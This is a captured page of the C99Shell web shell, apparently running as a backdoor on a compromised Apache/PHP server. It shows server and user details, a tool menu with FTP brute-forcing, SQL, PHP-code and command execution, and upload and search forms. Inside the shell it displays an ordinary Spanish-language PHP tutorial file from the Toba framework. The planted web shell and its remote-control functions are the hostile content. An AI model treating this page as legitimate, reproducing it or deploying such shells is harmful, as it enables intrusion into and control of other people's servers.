!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_tdfonline/proyectos/toba_referencia/php/tutorial/   drwxr-xr-x
Free 14.57 GB of 61.93 GB (23.53%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     tp_tutorial.php (2.85 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
require_once("tp_referencia.php");

class 
tp_tutorial extends tp_referencia 
{

    protected function 
estilos_css()
    {
        
parent::estilos_css();
        
?>
        <style type="text/css">
            .codigo {
                padding: 10px; 
                margin-top: 5px;
                margin-bottom: 5px;
                border: 1px solid black; 
                background-color:#EEEAEE;        
            }
            .ci-cuerpo, .ci-wiz-cont {
                border: none;
                background-color: white;
                font-size: 12px;
            }
            .ci-wiz-enc {
                border: 0;
            }
            .ci-wiz-titulo, h2 {
                font-size: 1.5em; 
            }
            .lista-separada {
                list-style-image: url('<?php echo toba_recurso::imagen_toba('nucleo/carpeta.gif'); ?>');
            }
            .lista-separada li {
                margin-top: 10px;
            }    
            .lista-separada .proyectos {
                background-color: #EEEAEE;
                border: 1px solid gray;
            }
            li {
                margin-bottom: 4px;
            }
            .caption {
                text-align: left;
                margin-left: 10px;
                margin-right: 10px;
                font-size:80%;
                font-style: italic;
                display:block;
            }
            .img-ef {
                background-color: #D5CECD;
                border: 1px solid gray;
            }            
        </style>            
        <?php
    
}    
    
    function 
titulo_item()
    {
        return 
'Tutorial';    
    }
    
}


function 
mostrar_video($video$ancho=992$alto=487$controlador_propio=false)
{
    
$url_base get_url_desarrollos(true).'/toba_referencia_trunk/videos/';
    
$url_js toba_recurso::url_proyecto().'/videos/';    
    
$url_controller = ($controlador_propio) ? $url_base.$video.'-cont.swf'  $url_base.'controller.swf';
    return 
'
      <script type="text/javascript" src="'
.$url_js.'swfobject.js"></script>
        <script type="text/javascript" src="'
.$url_js.'cam_embed.js"></script>        
      <div id="flashcontent">               
            <div id="cs_noexpressUpdate">
              <p>The Camtasia Studio video content presented here requires JavaScript to be enabled and the  latest version of the Macromedia Flash Player. If you are you using a browser with JavaScript disabled please enable it now. Otherwise, please update your version of the free Flash Player by <a href="http://www.macromedia.com/go/getflashplayer">downloading here</a>. </p>
            </div>
       </div>
      <script type="text/javascript">
          // <![CDATA[          
         var fo = new SWFObject( "'
.$url_controller.'", "'.$url_controller.'", "'.$ancho.'", "'.$alto.'", "7", "#FFFFFF", false, "best" );
         fo.addVariable( "csConfigFile", "'
.$url_base.$video.'.xml"  ); 
         fo.addVariable( "csColor"     , "FFFFFF"           );
         fo.addVariable( "csPreloader" , "'
.$url_base.'preload.swf" );
         if( args.movie )
         {
            fo.addVariable( "csFilesetBookmark", args.movie );
         }
         fo.write("flashcontent");                 
         // ]]>

       </script>      
   '
;    
}

function 
mostrar_php($codigo)
{
    
$salida highlight_string($codigotrue);
    
$salida str_replace('&lt;?php<br />'''$salida);
    
$salida str_replace('?&gt;<br />'''$salida);
    return 
"<div class='codigo'>".$salida."</div>";
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.8219 ]--